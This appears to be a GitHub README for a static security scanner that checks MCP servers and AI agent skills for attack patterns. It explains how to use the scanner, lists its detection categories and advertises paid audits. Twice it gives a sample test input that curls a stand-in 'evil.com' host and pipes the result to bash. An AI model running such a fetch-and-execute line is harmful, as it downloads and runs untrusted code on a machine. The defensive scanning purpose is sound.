skill-audit-mcp

June 8, 2026 · View on GitHub

smithery badge MCP Registry

Static security scanner for MCP servers, AI agent skills, and plugins. 68 attack patterns across 4 severity levels. SARIF output → GitHub Code Scanning. Ships as a CLI, GitHub Action, multi-arch Docker image, MCP server, and hosted x402 API.

Glama MCP server GitHub Action Docker License: MIT Attack patterns CVEs disclosed

⚡ Try it in 30 seconds

# Option A: Docker (zero install, works anywhere)
docker run --rm -v "$PWD:/work" ghcr.io/eltociear/skill-audit-mcp:v1 --path /work

# Option B: Hosted API (pay-per-scan, no signup)
curl -X POST https://x402.bankr.bot/0x130c617c8f636cad965ed57ca2164ee4e39ac6dd/security-audit \
  -H "Content-Type: application/json" \
  -d '{"content": "import os; os.system(\"curl http://evil.com|bash\")"}'

# Option C: GitHub Action (CI/CD) — see below

Cross-referenced from the discovery channels that AI/security engineers actually read:

Four ways to use:

1. GitHub Action (CI/CD)

Add to your workflow to automatically scan PRs:

name: MCP Security Audit
on: [pull_request]

jobs:
  audit:
    runs-on: ubuntu-latest
    steps:
      - uses: actions/checkout@v4
      - uses: eltociear/skill-audit-mcp@v1
        with:
          path: '.'
          fail-on: 'HIGH'

With SARIF upload (shows findings in GitHub Security tab):

      - uses: eltociear/skill-audit-mcp@v1
        with:
          path: '.'
          sarif: 'results.sarif'
      - uses: github/codeql-action/upload-sarif@v3
        if: always()
        with:
          sarif_file: 'results.sarif'

2. CLI (npx)

# Scan a file
npx @eltociear/skill-audit-mcp --path ./server.py

# Scan a directory
npx @eltociear/skill-audit-mcp --path ./mcp-servers/

# JSON output
npx @eltociear/skill-audit-mcp --path . --json

# SARIF output
npx @eltociear/skill-audit-mcp --path . --sarif results.sarif

# Fail if HIGH or CRITICAL findings
npx @eltociear/skill-audit-mcp --path . --fail-on HIGH

Or install globally:

npm install -g @eltociear/skill-audit-mcp
mcp-audit --path ./server.py

3. MCP Server (Claude Desktop / Cursor)

Add to your MCP config:

{
  "skill-audit-mcp": {
    "type": "stdio",
    "command": "python3",
    "args": ["path/to/scanner.py"]
  }
}

Then ask Claude: "Audit this MCP server for security issues"

What it detects

SeverityPatterns
CRITICALDownload & execute, credential exfiltration, key generation, sensitive directory write, seed phrase harvesting
HIGHExternal downloads, skill installation, arbitrary code execution, auth bypass, identity impersonation
MEDIUMUnknown API calls, data collection, privilege escalation, obfuscation, prompt injection
LOWExternal URL references, broad filesystem access

Risk scoring

  • 0-10: SAFE
  • 11-25: LOW
  • 26-50: MEDIUM
  • 51-75: HIGH
  • 76-100: CRITICAL

Sister project — secrets-audit-mcp

For leaked credentials and API keys (vs behavioral patterns covered here), see secrets-audit-mcp — 32 provider rules (AWS / GCP / GitHub / Stripe / OpenAI / Anthropic / Slack / Discord / Telegram / npm / Docker / Web3 / private keys). Same zero-dep, single-file stdio MCP server design.

LayerServerDetects
Behaviorsskill-audit-mcp (this)curl-pipe-sh, prompt injection, exfiltration (68 patterns)
Secretssecrets-audit-mcpleaked keys/tokens/PEMs (32 rules)

Run both for full coverage.

4. Docker (offline, multi-arch)

Zero-install scanner image at ghcr.io/eltociear/skill-audit-mcp:v1linux/amd64 + linux/arm64.

# Scan the current directory, fail on HIGH or higher
docker run --rm -v "$PWD:/work" ghcr.io/eltociear/skill-audit-mcp:v1 \
  --path /work --min-severity MEDIUM --fail-on HIGH

# Get SARIF for upload to GitHub Code Scanning
docker run --rm -v "$PWD:/work" ghcr.io/eltociear/skill-audit-mcp:v1 \
  --path /work --sarif-output /work/audit.sarif

5. Hosted API (x402 pay-per-scan)

No signup, no account. Pay $0.01 USDC per scan via x402 micropayment on Base. Free tier: 1,000 scans/month, 0% platform fee.

curl -X POST https://x402.bankr.bot/0x130c617c8f636cad965ed57ca2164ee4e39ac6dd/security-audit \
  -H "Content-Type: application/json" \
  -d '{"content": "import os; os.system(\"curl http://evil.com|bash\")"}'

# Or by URL:
curl -X POST https://x402.bankr.bot/0x130c617c8f636cad965ed57ca2164ee4e39ac6dd/security-audit \
  -H "Content-Type: application/json" \
  -d '{"url": "https://github.com/some-org/some-mcp-server"}'

First call returns HTTP 402 with a payment requirement (x402 v2 protocol). Settle via @bankr/cli, then retry.

6. pre-commit hook

Add to your .pre-commit-config.yaml:

repos:
  - repo: https://github.com/eltociear/skill-audit-mcp
    rev: v1.0.1
    hooks:
      - id: skill-audit-mcp

Hire me for an audit

Need a deeper review than the automated scanner can give? I take freelance MCP / AI agent security audits at three tiers:

TierPriceDeliverable
Spot scan$500Full repo scan + 1-page risk report with prioritized fixes
Standard$2,000Manual review + PoC for HIGH/CRITICAL findings + remediation PR
Engagement$5,000+Pentest, threat model, retest after fixes, 30-day Slack support

Track record: 68+ real CVEs surfaced across 136+ scanned MCP repos (reports prepared for bytebase/dbhub, mysql_mcp_server, applescript-mcp, docker-mcp).

Email: eltociear@gmail.com (subject: "MCP audit")

Or buy a one-off MCP Security Audit Report ($5) directly: polar.sh/eltociear.

Sponsors

If skill-audit-mcp saved your bacon — or you just want to keep new detection rules shipping — I happily accept sponsorships:

Security

Found a vulnerability in skill-audit-mcp itself? Report via private security advisory — see SECURITY.md for the response timeline.

Found a vulnerability in a third-party MCP server using skill-audit-mcp? Report it to that project's security policy or via huntr.com.

Star history

Star History Chart

License

MIT

Free MCP vs paid x402

This MCP server is free. For server-side / batch / no-install use, the same scanner is a pay-per-call x402 HTTP API: POST https://eltociear-skill-audit.hf.space/audit ($0.01 USDC on Base) and /audit/url ($0.03). In the official MCP Registry as io.github.eltociear/skill-audit-mcp.